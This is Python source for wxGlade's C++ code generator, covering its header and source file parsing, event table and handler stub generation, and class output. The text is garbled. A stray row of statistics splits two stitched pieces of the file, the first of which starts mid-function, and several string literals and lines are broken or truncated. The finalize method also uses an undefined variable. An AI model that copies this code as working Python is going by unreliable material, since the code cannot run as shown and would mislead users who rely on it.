    if not obj.IS_SIZER:  # the object is a wxWindow instance
        if obj.check_prop_truth("extracode_pre"):
            init = obj.properties["extracode_pre"].get_lines() + init
        if obj.check_prop_truth("extracode_post"):
            init += obj.properties["extracode_post"].get_lines()
        if obj.check_prop_truth('extraproperties'):  # insert these only after extracode_post
            init += self.generate_code_extraproperties(obj)
    mycn = getattr(builder, 'cn', self.cn)
    for win_id, evt, handler, evt_type in builder.get_event_handlers(obj):
        klass.event_handlers.append( (win_id, mycn(evt), handler, evt_type) )
    # try to see if there's some extra code to add to this class;
    # an optional '###' separator line splits it into header and source parts
    extra_code = getattr(builder, 'extracode', getattr(obj, 'extracode', "") or "")
    if extra_code:
        extra_code = re.sub(r'\\n', '\n', extra_code)
        extra_code = re.split(re.compile(r'^###\s*$', re.M), extra_code, 1)
        klass.extra_code_h.append(extra_code[0])
        if len(extra_code) > 1:
            klass.extra_code_cpp.append(extra_code[1])
        # if we are not overwriting existing source, warn the user about the presence of extra code
        if not self.multiple_files and self.previous_source:
            self.warning( '%s has extra code, but you are not overwriting existing sources: please check '
                          'that the resulting code is correct!' % obj.name )
    klass.ids.extend(ids)
    if self.store_as_attr(obj):
        # remember the declared type for the 'attributes' block of the header
        if obj.check_prop("instance_class"):
            klassname = obj.instance_class
        else:
            klassname = obj.get_prop_value("class", obj.WX_CLASS)
        klass.sub_objs.append( (klassname, obj.name) )
    klass.init.extend(init)
    if parent_builder:  # add to sizer or notebook
        klass.init.extend( parent_builder.get_code_per_child(parent, obj) )
    klass.final[:0] = final
    if self.multiple_files and obj.IS_CLASS:
        # BUG FIX: ClassLines.dependencies is a set(); the original code called
        # .append() here, which raised AttributeError for class instances in
        # multiple-file mode.  Use .add() instead.
        klass.dependencies.add(obj.klass)
    else:
        if obj.WX_CLASS in self.obj_builders:
            headers = getattr(self.obj_builders[obj.WX_CLASS], 'import_modules', [])
            klass.dependencies.update(headers)
    return builder
def generate_code_event_handler(self, code_obj, is_new, tab, prev_src, event_handlers):
    """Generate the C++ event handler stubs for code_obj's class.

    code_obj: object to generate code for (CodeObject)
    is_new: True when no previous source code exists
    tab: indentation string for the function bodies
    prev_src: previous source code (SourceFileContent) or None
    event_handlers: list of (win_id, event, handler, evt_type) tuples
    Returns a list of source code fragments.
    """
    if not event_handlers:
        return []
    stub_template = """
void %(klass)s::%(handler)s(%(evt_type)s &event) // wxGlade: %(klass)s.<event_handler>
{
%(tab)sevent.Skip();
%(tab)s// notify the user that he hasn't implemented the event handler yet
%(tab)swxLogDebug(wxT("Event handler (%(klass)s::%(handler)s) not implemented yet"));
}
"""
    # handlers already present in the old sources must not be re-generated;
    # the set is shared with prev_src so additions are remembered
    generated = prev_src.event_handlers.get(code_obj.klass, set()) if prev_src else set()
    out = []
    for _win_id, _event, handler, evt_type in event_handlers:
        if handler in generated:
            continue
        out.append( stub_template % {'evt_type': evt_type, 'handler': handler,
                                     'klass': code_obj.klass, 'tab': tab} )
        generated.add(handler)
    if is_new or not prev_src:
        out.append('\n\n')
    out.append('// wxGlade: add %s event handlers\n' % code_obj.klass)
    if is_new or not prev_src:
        out.append('\n')
    return out
def generate_code_event_table(self, code_obj, is_new, tab, prev_src, event_handlers):
    """Generate the wxWidgets event table for code_obj's class.

    code_obj: object to generate code for (CodeObject)
    is_new: True when no previous source code exists
    tab: indentation string
    prev_src: previous source code (SourceFileContent) or None
    event_handlers: list of (obj_or_id, event, handler, evt_type) tuples
    Returns a list of source code lines.
    """
    if not event_handlers:
        return []
    lines = []
    table_exists = bool(prev_src) and code_obj.klass in prev_src.event_table_decl
    # only emit BEGIN/END_EVENT_TABLE when generating fresh code or when the
    # old sources did not already declare an event table
    emit_wrapper = is_new or not table_exists
    if emit_wrapper:
        lines.append('\nBEGIN_EVENT_TABLE(%s, %s)\n' % (code_obj.klass, code_obj.WX_CLASS))
    lines.append(tab + '// begin wxGlade: %s::event_table\n' % code_obj.klass)
    for obj, event, handler, evt_type in event_handlers:
        if obj is None:
            continue
        win_id = obj if isinstance(obj, str) else self.generate_code_id(obj)[1]
        if 'EVT_NAVIGATION_KEY' in event:
            # EVT_NAVIGATION_KEY takes no window id argument
            lines.append('%s%s(%s::%s)\n' % (tab, event, code_obj.klass, handler))
        else:
            lines.append('%s%s(%s, %s::%s)\n' % (tab, event, win_id, code_obj.klass, handler))
    lines.append(tab + '// end wxGlade\n')
    if emit_wrapper:
        lines.append('END_EVENT_TABLE();\n\n')
    return lines
def generate_code_id(self, obj, id=None):
    """Resolve a window id specification into C++ code.

    Returns a (declaration, access_expression) pair; the declaration is an
    empty string when nothing needs to be declared.  A value of '?' is
    replaced by an auto-generated 'wxID_HIGHEST + n' value, remembered in
    self.generated_ids so the same name always maps to the same id.
    """
    if id is None:
        id = obj.window_id
    if not id:
        # no explicit id: use the stock item id if available, wxID_ANY otherwise
        if obj is not None and obj.check_prop_truth("stockitem"):
            return '', "wxID_" + obj.stockitem
        return '', 'wxID_ANY'
    parts = str(id).split('=', 1)
    if len(parts) != 2:
        return '', parts[0]  # we assume name is declared elsewhere
    name, value = parts
    if not name:
        return '', value
    name = name.strip()
    value = value.strip()
    if value == '?':
        value = self.generated_ids.get(name)
        if value is None:
            value = 'wxID_HIGHEST + %d' % self.last_generated_id
            self.last_generated_id += 1
            self.generated_ids[name] = value
    return '%s = %s' % (name, value), name
def generate_code_size(self, obj):
    """Return the C++ statement that sets the widget's size.

    Uses SetMinSize for widgets inside a parent window, SetSize otherwise.
    A trailing 'd' on the size string marks dialog units, which are
    converted via wxDLG_UNIT.
    """
    prefix = self.format_generic_access(obj)
    target = 'this' if obj.IS_CLASS else obj.name
    size = obj.properties["size"].get_string_value()
    method = 'SetMinSize' if obj.parent_window else 'SetSize'
    if size[-1] == 'd':
        # dialog units: strip the marker and wrap in wxDLG_UNIT
        return '%s%s(wxDLG_UNIT(%s, wxSize(%s)));\n' % (prefix, method, target, size[:-1])
    return '%s%s(wxSize(%s));\n' % (prefix, method, size)
def quote_path(self, s):
    """Quote a file path for C++ output, wrapping the base-class quoting in wxT()."""
    quoted = super(CPPCodeWriter, self).quote_path(s)
    return 'wxT(%s)' % quoted
def _quote_str(self, s):
if self._use_gettext:
return '_("%s")' % s
return 'wxT("%s")' % s
def format_generic_access(self, obj):
    """Return the C++ member-access prefix for obj: '' inside the class itself,
    '<name>->' for child widgets."""
    return '' if obj.IS_CLASS else '%s->' % obj.name
def _format_dependencies(self, dependencies):
"Format a list of header files for the dependencies output"
dep_list = []
for dependency in sorted(dependencies): # unique and sorted
if dependency and ('"' != dependency[0] != '<'):
dep_list.append('#include "%s.h"\n' % dependency)
else:
dep_list.append('#include %s\n' % dependency)
return self._tagcontent( '::dependencies', dep_list )
# module-level singleton: wxGlade's code-generation dispatcher imports these two names
writer = CPPCodeWriter() # The code writer is an instance of CPPCodeWriter
language = writer.language # Language generated by this code generator
| 45.243486 | 120 | 0.558901 |
import os.path, re, logging
from codegen import BaseLangCodeWriter, BaseSourceFileContent, _replace_tag
from codegen import ClassLines as BaseClassLines
import config, wcodegen
class SourceFileContent(BaseSourceFileContent):
rec_block_start = re.compile(
r'^(?P<spaces>\s*)'
r'//\s*'
r'begin\s+wxGlade:\s*'
r'(?P<classname>\w*)'
r'::'
r'(?P<block>\w+)'
r'\s*$'
)
rec_block_end = re.compile(
r'^\s*'
r'//\s*'
r'end\s+wxGlade'
r'\s*$'
)
rec_class_end = re.compile(
r'^\s*};\s*'
r'//\s*'
r'wxGlade:\s+end\s+class'
r'\s*$'
)
rec_class_decl = re.compile(
r'^\s*'
r'class\s+([a-zA-Z_]\w*)'
r'\s*'
)
rec_decl_event_table = re.compile(
r'^\s*'
r'DECLARE_EVENT_TABLE\s*\(\s*\)\s*;?'
r'\s*$'
)
rec_def_event_table = re.compile(
r'^\s*'
r'BEGIN_EVENT_TABLE\s*\(\s*(\w+)\s*,\s*(\w+)\s*\)'
r'\s*$'
)
rec_event_handler = re.compile(
r'^\s*'
r'(?:virtual\s+)?'
r'void\s+(?P<handler>[A-Za-z_]+\w*)'
r'\s*'
r'\([A-Za-z_:0-9]+\s*&\s*\w*\)\s*;'
r'\s*'
r'//\s*wxGlade:\s*<event_handler>'
r'\s*$'
)
rec_event_handlers_marker = re.compile(
r'^\s*'
r'//\s*wxGlade:\s*add\s+'
r'((?:\w|:)+)\s+event handlers'
r'\s*$'
)
def __init__(self, name, code_writer):
self.header_content = None
self.content = None
self.event_table_decl = {}
self.event_table_def = {}
self.header_extension = code_writer.header_extension
self.source_extension = code_writer.source_extension
BaseSourceFileContent.__init__(self, name, code_writer)
def replace_header(self, tag, content):
return _replace_tag(self.header_content, tag, content)
def build_untouched_content(self):
BaseSourceFileContent.build_untouched_content(self)
self._build_untouched(self.name + "." + self.header_extension, True)
BaseSourceFileContent.build_untouched_content(self)
self._build_untouched(self.name + "." + self.source_extension, False)
def _build_untouched(self, filename, is_header):
prev_was_handler = False
events_tag_added = False
inside_block = False
inside_comment = False
tmp_in = self._load_file(filename)
out_lines = []
check_old_methods = []
for line in tmp_in:
comment_index = line.find('/*')
if not inside_comment and comment_index != -1 and comment_index > line.find('//'):
inside_comment = True
if inside_comment:
end_index = line.find('*/')
if end_index > comment_index:
inside_comment = False
if not is_header:
result = None
else:
result = self.rec_class_decl.match(line)
if not inside_comment and not inside_block and result:
if not self.class_name:
out_lines.append( '<%swxGlade insert new_classes>' % self.nonce )
self.new_classes_inserted = True
self.class_name = result.group(1)
self.class_name = self.format_classname(self.class_name)
self.classes.add( self.class_name )
out_lines.append(line)
elif not inside_block:
result = self.rec_block_start.match(line)
if not inside_comment and result:
spaces = result.group('spaces')
which_class = result.group('classname')
which_block = result.group('block')
if not which_class:
which_class = self.class_name
else:
which_class = self.format_classname(which_class)
self.spaces[which_class] = spaces
inside_block = True
if which_block in ("do_layout","set_properties"):
check_old_methods.append( len(out_lines) )
out_lines.append( '<%swxGlade replace %s %s>' %
(self.nonce, result.group('classname'), result.group('block') ) )
else:
dont_append = False
if is_header and not inside_comment:
result = self.rec_event_handler.match(line)
if result:
prev_was_handler = True
which_handler = result.group('handler')
which_class = self.class_name
self.event_handlers.setdefault( which_class, set() ).add( which_handler )
else:
if prev_was_handler:
out_lines.append('<%swxGlade event_handlers %s>' % (self.nonce, self.class_name) )
prev_was_handler = False
events_tag_added = True
elif not events_tag_added and \
self.is_end_of_class(line):
out_lines.append( '<%swxGlade event_handlers %s>' % (self.nonce, self.class_name) )
result = self.rec_decl_event_table.match(line)
if result:
self.event_table_decl[self.class_name] = True
elif not inside_comment:
result = self.rec_event_handlers_marker.match(line)
if result:
out_lines.append( '<%swxGlade add %s event handlers>' % (self.nonce, result.group(1)) )
dont_append = True
result = self.rec_def_event_table.match(line)
if result:
which_class = result.group(1)
self.event_table_def[which_class] = True
if not dont_append:
out_lines.append(line)
else:
if self.rec_block_end.match(line):
inside_block = False
if is_header and not self.new_classes_inserted:
out_lines.append('<%swxGlade insert new_classes>' % self.nonce)
while check_old_methods:
i = check_old_methods.pop(-1)
if out_lines[i+1].strip()=='}':
self._remove_method(out_lines, i-2, i+1)
if is_header:
self.header_content = out_lines
else:
self.content = out_lines
def is_end_of_class(self, line):
return self.rec_class_end.match(line)
class ClassLines(BaseClassLines):
def __init__(self):
BaseClassLines.__init__(self)
self.ids = []
self.sub_objs = []
self.extra_code_h = []
self.extra_code_cpp = []
self.dependencies = set()
class CPPCodeWriter(BaseLangCodeWriter, wcodegen.CppMixin):
ClassLines = ClassLines
_code_statements = {
'backgroundcolour': "%(objname)sSetBackgroundColour(%(value)s);\n",
'disabled': "%(objname)sEnable(0);\n",
'extraproperties': "%(objname)sSet%(propname_cap)s(%(value)s);\n",
'focused': "%(objname)sSetFocus();\n",
'foregroundcolour': "%(objname)sSetForegroundColour(%(value)s);\n",
'hidden': "%(objname)sHide();\n",
'setfont': "%(objname)sSetFont(wxFont(%(size)s, %(family)s, "
"%(style)s, %(weight)s, %(underlined)s, wxT(%(face)s)));\n",
'tooltip': "%(objname)sSetToolTip(%(tooltip)s);\n",
'wxcolour': "wxColour(%(value)s)",
'wxnullcolour': "wxNullColour",
'wxsystemcolour': "wxSystemSettings::GetColour(%(value)s)",
}
class_separator = '::'
language_note = \
'// Example for compiling a single file project under Linux using g++:\n' \
'// g++ MyApp.cpp $(wx-config --libs) $(wx-config --cxxflags) -o MyApp\n' \
'//\n' \
'// Example for compiling a multi file project under Linux using g++:\n' \
'// g++ main.cpp $(wx-config --libs) $(wx-config --cxxflags) -o MyApp Dialog1.cpp Frame1.cpp\n' \
'//\n'
output_name = None
output_header = None
output_file = None
shebang = '// -*- C++ -*-\n//\n'
tmpl_cfunc_end = '}\n\n'
tmpl_sizeritem = '%s->Add(%s, %s, %s, %s);\n'
tmpl_sizeritem_button = '%s->AddButton(%s)\n'
tmpl_gridbagsizeritem = '%s->Add(%s, wxGBPosition%s, wxGBSpan%s, %s, %s);\n'
tmpl_gridbagsizerspacer = '%s->Add(%s, %s, wxGBPosition%s, wxGBSpan%s, %s, %s);\n'
tmpl_spacersize = '%s, %s'
tmpl_appfile = """\
%(overwrite)s\
%(header_lines)s\
#include "%(filename_top_win_class)s"
"""
tmpl_init_gettext = """\
#include <wx/intl.h>
#ifndef APP_CATALOG
#define APP_CATALOG "%(textdomain)s" // replace with the appropriate catalog name
#endif
"""
def _get_app_template(self, app, top_win):
if not self.app_name: return None
klass = app.klass
if self._use_gettext:
gettext1 = ["protected:", "%(tab)swxLocale m_locale; // locale we'll be using"]
gettext2 = ['%(tab)sm_locale.Init();',
'
'%(tab)sm_locale.AddCatalogLookupPathPrefix(wxT(APP_LOCALE_DIR));',
'
'%(tab)sm_locale.AddCatalog(wxT(APP_CATALOG));\n']
else:
gettext1 = gettext2 = []
if klass:
klass1 = 'class %(klass)s: public wxApp {'
klass2 = ['IMPLEMENT_APP(%(klass)s)\n',
'bool %(klass)s::OnInit()']
else:
klass1 = 'class MyApp: public wxApp {'
klass2 = ['IMPLEMENT_APP(MyApp)\n',
'bool MyApp::OnInit()',]
ret = ['', klass1,
'public:', '%(tab)sbool OnInit();'
] + gettext1 + ['};\n'] + klass2 + ['{'] + gettext2 + [
'%(tab)swxInitAllImageHandlers();',
'%(tab)s%(top_win_class)s* %(top_win)s = new %(top_win_class)s(NULL, wxID_ANY, wxEmptyString);',
'%(tab)sSetTopWindow(%(top_win)s);',
'%(tab)s%(top_win)s->Show();',
'%(tab)sreturn true;',
'}', '']
return '\n'.join(ret)
tmpl_empty_string = 'wxEmptyString'
def init_lang(self, app=None):
self.last_generated_id = 1000
self.generated_ids = {}
# Extensions and main filename based on Project options when set
if app is not None:
self.source_extension = app.source_extension or config.default_source_extension
self.header_extension = app.header_extension or config.default_header_extension
else:
self.source_extension = config.default_source_extension
self.header_extension = config.default_header_extension
if hasattr(app, "app_filename"): # only for testing
base = os.path.splitext(app.app_filename)[0]
else:
base = os.path.splitext(config.default_cpp_app_name)[0] #
self.app_filename = '%s.%s' % (base, self.source_extension)
self.header_lines = [ '
'
# include i18n / gettext
if self._use_gettext and self._textdomain:
self.header_lines.append( self.tmpl_init_gettext % {'textdomain': self._textdomain} )
# extra lines to generate (see the 'extracode' property of top-level widgets)
self._current_extra_code_h = []
self._current_extra_code_cpp = []
def init_files(self, out_path):
if self.multiple_files:
self.previous_source = None
self.out_dir = out_path
else:
name = os.path.splitext(out_path)[0]
self.output_name = name
if not self._overwrite:
header_exists = self._file_exists(name + "." + self.header_extension)
source_exists = self._file_exists(name + "." + self.source_extension)
if (header_exists and not source_exists) or (source_exists and not header_exists):
ret = _("To keep existing user code, both header and source file must exist.\n"
"(files '%s...'")
return ret%name
if not self._overwrite and header_exists:
# keep all the lines not inside a wxGlade block.
self.previous_source = SourceFileContent(name, self)
else:
# if the file doesn't exist, create it and write the intro
self.previous_source = None
self.output_header = []
self.output_file = []
oh = os.path.basename(name + "." + self.header_extension).upper().replace( '.', '_' )
self.output_header.append('#ifndef %s\n#define %s\n' % (oh, oh))
self.output_header.append('\n')
for line in self.header_lines:
self.output_header.append(line)
self.output_header.append('\n')
self.output_header.append('<%swxGlade replace dependencies>' % self.nonce)
self.output_header.append('\n')
self.output_header.append('<%swxGlade replace extracode>' % self.nonce)
self.output_header.append('\n')
self.output_file.append('#include "%s.%s"\n\n' % (os.path.basename(name), self.header_extension))
self.output_file.append('<%swxGlade replace extracode>\n' % self.nonce)
self.output_file.append('\n')
def output_header_replace(self, tag, content):
_replace_tag(self.output_header, tag, content)
def finalize(self):
if self.previous_source:
tag = '<%swxGlade insert new_classes>' % self.nonce
if self.previous_source.new_classes:
code = "".join([c[0] for c in self.previous_source.new_classes])
else:
code = ""
self.previous_source.replace_header(tag, code)
extra_source = "".join([c[1] for c in self.previous_source.new_classes])
tag = '<%swxGlade replace extracode>' % self.nonce
code = self._tagcontent( '::extracode', self._current_extra_code_h )
self.previous_source.replace_header(tag, code)
code = self._tagcontent( '::extracode', self._current_extra_code_cpp )
self.previous_source.replace(tag, code)
tags = re.compile( r'(<%swxGlade replace ([a-zA-Z_]*\w*) (\w+)>)' % self.nonce )
for i,line in enumerate(self.previous_source.header_content):
match = tags.match(line)
if not match: continue
tag = match.groups()
if tag[2] == 'dependencies':
#self._logger.debug('writing dependencies')
deps = set()
for code in self.classes.values():
deps.update(code.dependencies)
lines = self._format_dependencies( deps )
elif tag[2] == 'methods':
lines = ''
else:
lines = '// content of this block (%s) not found: did you rename this class?\n' % tag[2]
self.previous_source.replace_header(tag[0], lines)
# remove all the remaining <123415wxGlade ...> tags in source file XXX make more efficient
self._content_notfound( self.previous_source )
tag_start = r'<%swxGlade add ' % self.nonce
tag_end = r' event_handlers>'
for i, line in enumerate(self.previous_source.content):
if line.startswith(tag_start) and line.endswith(tag_end):
source_content.content[i] = ""
# write the new file contents to disk
header_content = "".join( self.previous_source.header_content )
self.save_file( self.previous_source.name + "." + self.header_extension, header_content, content_only=True )
if extra_source:
extra_source = '\n\n' + extra_source
source_content = "".join( self.previous_source.content )
self.save_file( self.previous_source.name + "." + self.source_extension, source_content + extra_source,
content_only=True )
elif not self.multiple_files:
oh = os.path.basename(self.output_name).upper() + '_H'
self.output_header.append('\n
# write the list of include files
deps = set()
for code in self.classes.values():
deps.update(code.dependencies)
code = self._format_dependencies( deps )
self.output_header_replace( '<%swxGlade replace dependencies>' % self.nonce, code )
# extra code (see the 'extracode' property of top-level widgets)
tag = '<%swxGlade replace extracode>' % self.nonce
code = self._tagcontent('::extracode', self._current_extra_code_h)
self.output_header_replace( tag, code )
code = self._tagcontent('::extracode', self._current_extra_code_cpp)
self.output_file_replace( tag, code )
self.save_file( self.output_name + "." + self.header_extension, self.output_header, self._app_added )
self.save_file( self.output_name + "." + self.source_extension, self.output_file, self._app_added )
self.output_file = self.output_header = None
def add_app(self, app_attrs, top_win):
# add language specific mappings
self.lang_mapping['filename_top_win_class'] = '%s.%s' % (top_win.klass, self.header_extension)
BaseLangCodeWriter.add_app(self, app_attrs, top_win)
def add_class(self, code_obj):
assert code_obj not in self.classes
try:
builder = self.obj_builders[code_obj.WX_CLASS]
except KeyError:
logging.error('%s', code_obj)
# this is an error, let the exception be raised; the details are logged by the global exception handler
raise
ret = self.classes[code_obj] = self.ClassLines() # ClassLines will collect the code lines incl. children
return ret
def finalize_class(self, code_obj):
# write the collected code for the class and its children
base = code_obj.WX_CLASS
klass = self.classes[code_obj]
classname = code_obj.klass
fmt_klass = self.cn_class(classname)
if self.multiple_files:
# let's see if the file to generate exists, and in this case create a SourceFileContent instance
filename = os.path.join(self.out_dir, classname.replace('::', '_') + "." + self.header_extension)
if self._overwrite or not self._file_exists(filename):
prev_src = None
else:
prev_src = SourceFileContent( os.path.join(self.out_dir, classname), self )
else:
prev_src = self.previous_source
if prev_src and classname in prev_src.classes:
is_new = False
else:
is_new = True
builder = self.obj_builders[base]
mycn = getattr(builder, 'cn', self.cn)
mycn_f = getattr(builder, 'cn_f', self.cn_f)
# collect all event handlers
event_handlers = klass.event_handlers
for win_id, evt, handler, evt_type in builder.get_event_handlers(code_obj):
event_handlers.append((win_id, mycn(evt), handler, evt_type))
# try to see if there's some extra code to add to this class
extra_code = getattr(builder, 'extracode', getattr(code_obj, 'extracode', "") or "")
if extra_code:
extra_code = re.sub(r'\\n', '\n', extra_code)
extra_code = re.split(re.compile(r'^###\s*$', re.M), extra_code, 1)
klass.extra_code_h.append(extra_code[0])
if len(extra_code) > 1:
klass.extra_code_cpp.append(extra_code[1])
if not is_new:
self.warning( '%s has extra code, but you are not overwriting existing sources:'
' please check that the resulting code is correct!' % code_obj.name )
if not self.multiple_files:
if klass.extra_code_h:
self._current_extra_code_h.append( "".join( klass.extra_code_h[::-1] ) )
if klass.extra_code_cpp:
self._current_extra_code_cpp.append( "".join( klass.extra_code_cpp[::-1] ) )
default_sign = [('wxWindow*', 'parent'), ('wxWindowID', 'id')]
sign = getattr(builder, 'constructor', default_sign)
defaults = []
for t in sign:
if len(t) == 3:
defaults.append(t[2])
else:
defaults.append(None)
tmp_sign = [t[0] + ' ' + t[1] for t in sign]
sign_decl2 = ', '.join(tmp_sign)
for i in range(len(tmp_sign)):
if defaults[i]:
tmp_sign[i] += '=%s' % defaults[i]
sign_decl1 = ', '.join(tmp_sign)
sign_inst = ', '.join([t[1] for t in sign])
custom_base = code_obj.check_prop_nodefault('custom_base') and code_obj.custom_base.strip() or None
header_buffer = []
source_buffer = []
hwrite = header_buffer.append
swrite = source_buffer.append
if is_new:
pass
elif custom_base:
self.warning( '%s has custom base classes, but you are not overwriting existing sources: '
'please check that the resulting code is correct!' % code_obj.name )
if is_new:
if custom_base:
base = ", public ".join([b.strip() for b in custom_base.split(',')])
hwrite('\nclass %s: public %s {\n' % (fmt_klass, base))
hwrite('public:\n')
if self._mark_blocks:
hwrite(self.tabs(1) + '// begin wxGlade: %s::ids\n' % fmt_klass)
ids = klass.ids
if hasattr(builder, 'get_ids_code'):
ids.extend(builder.get_ids_code(code_obj))
if ids:
hwrite(self.tabs(1) + 'enum {\n')
for id_name in ids:
hwrite('%s%s,\n' % (self.tabs(2), id_name))
hwrite(self.tabs(1) + '};\n')
if self._mark_blocks:
hwrite(self.tabs(1) + '// end wxGlade\n\n')
# constructor prototype
hwrite(self.tabs(1) + '%s(%s);\n' % (fmt_klass, sign_decl1))
hwrite('\nprivate:\n')
# declarations of the attributes
hwrite('\n')
hwrite('protected:\n')
hwrite(self.tabs(1) + '// begin wxGlade: %s::attributes\n' % fmt_klass)
for o_type, o_name in klass.sub_objs:
hwrite(self.tabs(1) + '%s* %s;\n' % (o_type, o_name))
hwrite(self.tabs(1) + '// end wxGlade\n')
if event_handlers:
t = self.tabs(1)
hwrite('\n' + t + 'DECLARE_EVENT_TABLE();\n')
hwrite('\npublic:\n')
already_there = set()
for win_id, evt, handler, evt_type in event_handlers:
if handler not in already_there:
hwrite('%svirtual void %s(%s &event); // wxGlade: <event_handler>\n' % (t, handler, evt_type))
already_there.add( handler )
hwrite('}; // wxGlade: end class\n\n')
elif prev_src:
if self._mark_blocks:
hwrite(self.tabs(1) + '// begin wxGlade: %s::ids\n' % fmt_klass)
ids = klass.ids
# let's try to see if there are extra ids to add to the enum
if hasattr(builder, 'get_ids_code'):
ids.extend(builder.get_ids_code(code_obj))
if ids:
hwrite(self.tabs(1) + 'enum {\n')
for id_name in ids:
hwrite('%s%s,\n' % (self.tabs(2), id_name))
hwrite(self.tabs(1) + '};\n')
if self._mark_blocks:
hwrite(self.tabs(1) + '// end wxGlade\n')
tag = '<%swxGlade replace %s ids>' % (self.nonce, classname)
if not prev_src.replace_header( tag, "".join(header_buffer) ):
self.warning("wxGlade ids block not found for %s, ids declarations code NOT generated" % code_obj.name)
tag = '<%swxGlade replace %s methods>' % (self.nonce, classname)
prev_src.replace_header(tag, [])
header_buffer = []
hwrite = header_buffer.append
if self._mark_blocks:
hwrite(self.tabs(1) + '// begin wxGlade: %s::attributes\n' % fmt_klass)
for o_type, o_name in klass.sub_objs:
hwrite(self.tabs(1) + '%s* %s;\n' % (o_type, o_name))
if self._mark_blocks:
hwrite(self.tabs(1) + '// end wxGlade\n')
tag = '<%swxGlade replace %s attributes>' % (self.nonce, classname)
if not prev_src.replace_header(tag, "".join(header_buffer)):
self.warning( "wxGlade attributes block not found for %s, attributes declarations code NOT generated" %
code_obj.name )
header_buffer = []
hwrite = header_buffer.append
if event_handlers:
already_there = prev_src.event_handlers.get(classname, set())
t = self.tabs(1)
for win_id, evt, handler, evt_type in event_handlers:
if handler not in already_there:
hwrite('%svirtual void %s(%s &event); // wxGlade: <event_handler>\n' % (t, handler, evt_type))
already_there.add( handler )
if classname not in prev_src.event_table_def:
hwrite('\nprotected:\n')
hwrite(self.tabs(1) + 'DECLARE_EVENT_TABLE()\n')
tag = '<%swxGlade event_handlers %s>' % (self.nonce, classname)
if not prev_src.replace_header( tag, "".join(header_buffer) ):
self.warning( "wxGlade events block not found for %s, event table code NOT generated" % code_obj.name )
tab = self.tabs(1)
style_p = code_obj.properties.get("style")
if style_p and style_p.value_set != style_p.default_value:
style = mycn_f(style_p.get_string_value())
if style:
sign_inst = sign_inst.replace('style', '%s' % style)
# constructor
if is_new:
base = "%s(%s)" % (base, sign_inst)
if custom_base:
bases = [b.strip() for b in custom_base.split(',')]
if bases:
base = "%s(%s)" % (bases[0], sign_inst)
rest = ", ".join([b + "()" for b in bases[1:]])
if rest:
base += ", " + rest
swrite('\n%s::%s(%s):\n%s%s\n{\n' % (fmt_klass, fmt_klass, sign_decl2, tab, base) )
if self._mark_blocks:
swrite(tab + '// begin wxGlade: %s::%s\n' % (fmt_klass, fmt_klass))
# the optional initial code from the code properties
if not self.preview and code_obj.check_prop("extracode_pre"):
for l in code_obj.properties["extracode_pre"].get_lines():
swrite(tab + l)
# set size here to avoid problems with splitter windows
if 'size' in code_obj.properties and code_obj.properties["size"].is_active():
swrite( tab + self.generate_code_size(code_obj) )
for l in builder.get_properties_code(code_obj):
swrite(tab + l)
for l in klass.init:
swrite(tab + l)
if klass.final:
swrite(tab + "\n")
for l in klass.final:
swrite(tab + l)
for l in builder.get_layout_code(code_obj):
swrite(tab + l)
# the optional final code from the code properties
if not self.preview and code_obj.check_prop("extracode_post"):
for l in code_obj.properties["extracode_post"].get_lines():
swrite(tab + l)
# now check if there are extra lines to add to the constructor
for l in builder.get_init_code(code_obj):
swrite(tab + l)
swrite( self.tmpl_ctor_call_layout % {'tab':tab} )
if self._mark_blocks:
# end tag
swrite('%s%s end wxGlade\n' % (tab, self.comment_sign))
# write class function end statement
if self.tmpl_cfunc_end and is_new:
swrite( self.tmpl_cfunc_end % {'tab':tab} )
# replace code inside existing constructor block
if prev_src and not is_new:
# replace the lines inside the ctor wxGlade block
# with the new ones
tag = '<%swxGlade replace %s %s>' % (self.nonce, classname, classname)
if not prev_src.replace( tag, "".join(source_buffer) ):
# no constructor tag found, issue a warning and do nothing
self.warning( "wxGlade %s::%s block not found, relative code NOT generated" % (fmt_klass, fmt_klass) )
source_buffer = []
swrite = source_buffer.append
# generate code for event table
code_lines = self.generate_code_event_table( code_obj, is_new, tab, prev_src, event_handlers )
if prev_src and not is_new:
tag = '<%swxGlade replace %s event_table>' % (self.nonce, classname)
if not prev_src.replace( tag, "".join(code_lines) ):
# no constructor tag found, issue a warning and do nothing
self.warning( "wxGlade %s::event_table block not found, relative code NOT generated" % fmt_klass )
else:
source_buffer.extend(code_lines)
# generate code for event handler stubs
code_lines = self.generate_code_event_handler( code_obj, is_new, tab, prev_src, event_handlers )
# replace code inside existing event handlers
if prev_src and not is_new:
tag = '<%swxGlade add %s event handlers>' % (self.nonce, classname)
if not prev_src.replace( tag, "".join(code_lines) ):
# no constructor tag found, issue a warning and do nothing
self.warning( "wxGlade %s event handlers marker not found, relative code NOT generated" % fmt_klass )
else:
source_buffer.extend(code_lines)
if not self.multiple_files and prev_src:
# if this is a new class, add its code to the new_classes list of the SourceFileContent instance
if is_new:
prev_src.new_classes.append( ("".join(header_buffer), "".join(source_buffer)) )
return
if self.multiple_files:
if base in self.obj_builders:
klass.dependencies.update( getattr(self.obj_builders[base], 'import_modules', []) )
if prev_src:
tag = '<%swxGlade insert new_classes>' % self.nonce
prev_src.replace_header(tag, "")
# insert the module dependencies of this class
# WARNING: there's a double space ' ' between 'replace' and 'dependencies' in the tag below,
tag = '<%swxGlade replace dependencies>' % self.nonce
code = self._format_dependencies(klass.dependencies)
prev_src.replace_header(tag, code)
extra_code_h = "".join(klass.extra_code_h[::-1])
extra_code_cpp = "".join(klass.extra_code_cpp[::-1])
if extra_code_h or extra_code_cpp:
self.warning( '%s (or one of its children) has extra code classes, but you are not overwriting '
'existing sources: please check that the resulting code is correct!' % code_obj.name )
extra_code_h = self._tagcontent("::extracode", extra_code_h)
extra_code_cpp = self._tagcontent("::extracode", extra_code_cpp)
tag = '<%swxGlade replace extracode>' % self.nonce
prev_src.replace_header(tag, extra_code_h)
prev_src.replace(tag, extra_code_cpp)
# store the new file contents to disk
name = os.path.join(self.out_dir, classname)
self.save_file( name +"."+ self.header_extension, "".join(prev_src.header_content), content_only=True )
self.save_file( name +"."+ self.source_extension, "".join(prev_src.content), content_only=True )
return
# create the new source file
header_file = os.path.join(self.out_dir, classname + "." + self.header_extension)
source_file = os.path.join(self.out_dir, classname + "." + self.source_extension)
hout = []
sout = []
# header file ----------------------------------------------------------------------------------------------
# isolation directives
hn = os.path.basename(header_file).upper().replace('.', '_')
hout.append(''\n')
# write the common lines
hout.extend( self.header_lines )
hout.append('\n')
# write the module dependencies for this class
code = self._format_dependencies(klass.dependencies)
hout.append(code)
hout.append('\n')
# insert the extra code of this class
extra_code_h = "".join(klass.extra_code_h[::-1])
